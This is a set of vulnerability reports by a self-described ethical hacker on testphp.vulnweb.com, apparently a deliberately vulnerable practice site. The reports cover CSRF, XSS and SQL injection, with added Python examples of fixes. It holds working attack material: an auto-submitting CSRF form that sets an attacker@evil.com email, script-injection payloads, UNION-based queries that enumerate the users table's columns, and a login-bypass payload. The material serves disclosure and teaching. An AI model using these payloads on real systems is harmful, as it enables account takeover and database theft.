Researcher: Asher (BugsHunter)
Date: July 26, 2025
Website: testphp.vulnweb.com
Endpoint: /userinfo.php
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the profile update functionality. The application lacks anti-CSRF tokens and fails to verify request origins, allowing attackers to forge unauthorized requests on behalf of authenticated users.
<html>
  <body>
    <form action="http://testphp.vulnweb.com/userinfo.php" method="POST">
      <input type="hidden" name="urname" value="Hacked by Asher ">
      <input type="hidden" name="ucc" value="1234-5678-0000-0000">
      <input type="hidden" name="uemail" value="attacker@evil.com">
      <input type="hidden" name="uphone" value="0000000000">
      <input type="hidden" name="uaddress" value="CSRF Street 1337">
      <input type="hidden" name="update" value="update">
      <input type="submit" value="Submit CSRF">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
An attacker can:
OWASP Risk: Medium
CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
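The fix the finding calls for is a server-side check that the browser cannot be tricked into satisfying: a per-session anti-CSRF token carried in the form, plus a check that the request's Origin (or Referer) is the site itself. The Python below is an added example, not the site's code; the origin is the one named on the page, the field names are those of the PoC form, and the session, headers and profile store are constructed dictionaries standing in for the real request context.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Origin of the application named on the page; everything else here is constructed.
SITE_ORIGIN = "http://testphp.vulnweb.com"
PROFILE_FIELDS = ("urname", "ucc", "uemail", "uphone", "uaddress")


def issue_csrf_token(session):
    """Mint one random token per session and keep it server side."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_origin(headers):
    """Accept only requests whose Origin (or, failing that, Referer) is our own site.
    Browsers attach Origin to cross-site POSTs, so the auto-submitted PoC form
    arrives with the attacker's origin, not ours."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def csrf_check(session, headers, form):
    """Two independent checks. A forged cross-site form fails the first, and,
    because the attacker cannot read the victim's session, the second as well."""
    if not same_origin(headers):
        return False, "request origin is not this site"
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    # Constant-time comparison on bytes so the check does not depend on charset.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid csrf token"
    return True, "ok"


def update_profile(session, headers, form, profile):
    """Hypothetical wrapper for the /userinfo.php update: fields are written
    only after csrf_check passes. Returns (applied, reason)."""
    ok, reason = csrf_check(session, headers, form)
    if not ok:
        return False, reason
    for field in PROFILE_FIELDS:
        if field in form:
            profile[field] = form[field]
    return True, "updated"
```

The token must be rendered into the legitimate profile form as a hidden field and tied to the session; setting the session cookie with SameSite=Lax or Strict is a further, browser-enforced layer, but it does not replace the token because the check must hold for older clients too.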
Researcher: Asher (BugsHunter)
Date: July 26, 2025
Website: testphp.vulnweb.com
Endpoint: /search.php
The application is vulnerable to both Reflected and Stored Cross-Site Scripting (XSS) attacks. User input is rendered in the HTML output without proper encoding or sanitization, allowing attackers to inject malicious JavaScript.
alert("Reflected XSS")
Tested URL: https://testphp.vulnweb.com/search.php?test=alert("Reflected XSS")
<script>alert("Stored XSS")</script>
Test Steps:
An attacker can execute arbitrary JavaScript in the victim's browser context. This can lead to:
OWASP Risk: High
CWE: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
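The finding is that the search term and stored comments are written into the HTML without encoding. The remedy is contextual output encoding at the point where the value is placed into the page. Below is an added example, not the site's code: a minimal renderer for the search page in its reported (interpolating) form next to the encoded form, and a small regression check a test suite can run over the output. The two payloads are the ones recorded on the page; the comment list and the page markup are constructed.

```python
import html
import re


def render_search_vulnerable(search_for, comments):
    """Interpolates raw input into the page, the behaviour reported above."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return f"<h2>Results for: {search_for}</h2>\n<ul>{items}</ul>"


def render_search(search_for, comments):
    """Same page with every untrusted value HTML-entity encoded at output time.
    quote=True also encodes quotes, so the value is safe inside attribute values."""
    safe_term = html.escape(search_for, quote=True)
    items = "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return f"<h2>Results for: {safe_term}</h2>\n<ul>{items}</ul>"


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def has_live_script(page):
    """Regression check: a raw <script tag in the rendered output means
    untrusted input reached the browser unencoded."""
    return SCRIPT_TAG.search(page) is not None
```

html.escape covers the HTML body and attribute contexts used here; a value placed inside a JavaScript block or a URL needs the encoding for that context instead. A Content-Security-Policy that disallows inline scripts is a useful second layer, but it does not make the encoding optional.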
Researcher: Asher (BugsHunter)
Date: July 26, 2025
Website: testphp.vulnweb.com
Endpoint: /artists.php?artist=
The application is vulnerable to SQL Injection via the artist parameter. Unsanitized input is directly passed to SQL queries, allowing an attacker to manipulate queries and extract sensitive database information.
Payload:
' OR 1=1 --
Error-based payload:
1'
Order by testing:
?artist=1 ORDER BY 1 --  -> OK
?artist=1 ORDER BY 4 --  -> error
?artist=-1 UNION SELECT 1,2,database() --  -> acuart
?artist=-1 UNION SELECT 1,2,table_name FROM information_schema.tables WHERE table_schema='acuart' LIMIT 7,1 --  -> users
?artist=-1 UNION SELECT 1,2,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1 --  -> uname
?artist=-1 UNION SELECT 1,2,column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1,1 --  -> pass
An attacker can enumerate tables, extract usernames, passwords, credit card details (cc), and other sensitive data. This can lead to full database compromise.
OWASP Risk: High
CWE: CWE-89 - Improper Neutralization of Special Elements used in an SQL Command
Vulnerability Type:
SQL Injection - Authentication Bypass
Affected URL:
http://testphp.vulnweb.com/login.php
Parameters Tested:
Payload Used:
Username: admin
Password:
' OR 'a'='a
Impact:
This payload bypasses the login mechanism by injecting a malicious SQL condition that always evaluates to true ('a'='a'). It results in unauthorized access to user accounts without knowing valid credentials.
Technical Explanation:
Original query:
SELECT * FROM users WHERE username = '$username' AND password = '$password';
Injected query:
SELECT * FROM users WHERE username = 'admin' AND password = '' OR 'a'='a';
Effective query:
SELECT * FROM users WHERE (username = 'admin' AND password = '') OR 'a'='a';
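Both SQL injection findings on this page (the artist parameter of /artists.php and the login form) have the same root cause: the request value is spliced into the query text, so the database parses attacker-controlled characters as SQL. The added example below, which is not the site's code, reproduces the login query from the explanation above in its string-built form and in a parameterized form, and does the same for the integer artist id, so the difference in behaviour can be checked directly. It uses an in-memory SQLite database with constructed rows; the table and column names follow the query shown above, and because SQLite is not MySQL the MySQL-specific UNION payloads are not replayed here, only the login payload and the ORDER BY probe.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, cc TEXT)")
    conn.execute("CREATE TABLE artists (artist_id INTEGER, aname TEXT, adesc TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "demo-admin-pw", "0000-0000-0000-0001"),
         ("test", "demo-test-pw", "0000-0000-0000-0002")],
    )
    conn.executemany(
        "INSERT INTO artists VALUES (?, ?, ?)",
        [(1, "artist one", "first constructed artist"),
         (2, "artist two", "second constructed artist")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string interpolation, as in the original query above.
    Returns the usernames the query matched."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Same query with bound parameters: the password is compared as a literal
    string, so the quote and OR in the payload are data, not SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def artist_vulnerable(conn, artist):
    """Numeric parameter spliced into the query; ORDER BY probing works because
    the database error is raised (and on the site, shown) for a bad column index."""
    sql = f"SELECT aname FROM artists WHERE artist_id = {artist}"
    return [row[0] for row in conn.execute(sql)]


def probe_raises_db_error(conn, artist):
    """True when the vulnerable query errors for this input (the error-based signal)."""
    try:
        artist_vulnerable(conn, artist)
        return False
    except sqlite3.OperationalError:
        return True


def artist_safe(conn, artist):
    """Validates the type first (the parameter is an integer id), then binds it.
    Non-numeric input is rejected before the database is touched."""
    try:
        artist_id = int(artist)
    except (TypeError, ValueError):
        raise ValueError("artist must be an integer id") from None
    sql = "SELECT aname FROM artists WHERE artist_id = ?"
    return [row[0] for row in conn.execute(sql, (artist_id,))]
```

With the payload from the page, login_vulnerable matches every row, which is exactly the "effective query" above, while login_safe matches none. For the artist endpoint the parameterized version never reaches the database with a malformed id, and the application should return a generic error page rather than the driver's message, since that message is what makes the ORDER BY probing informative.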
Proof of Concept:
Risk Level:
High - Allows complete authentication bypass and unauthorized admin access.
Recommendation:
Reported By:
Asher aka bugshunter
Cybersecurity Researcher & Ethical Hacker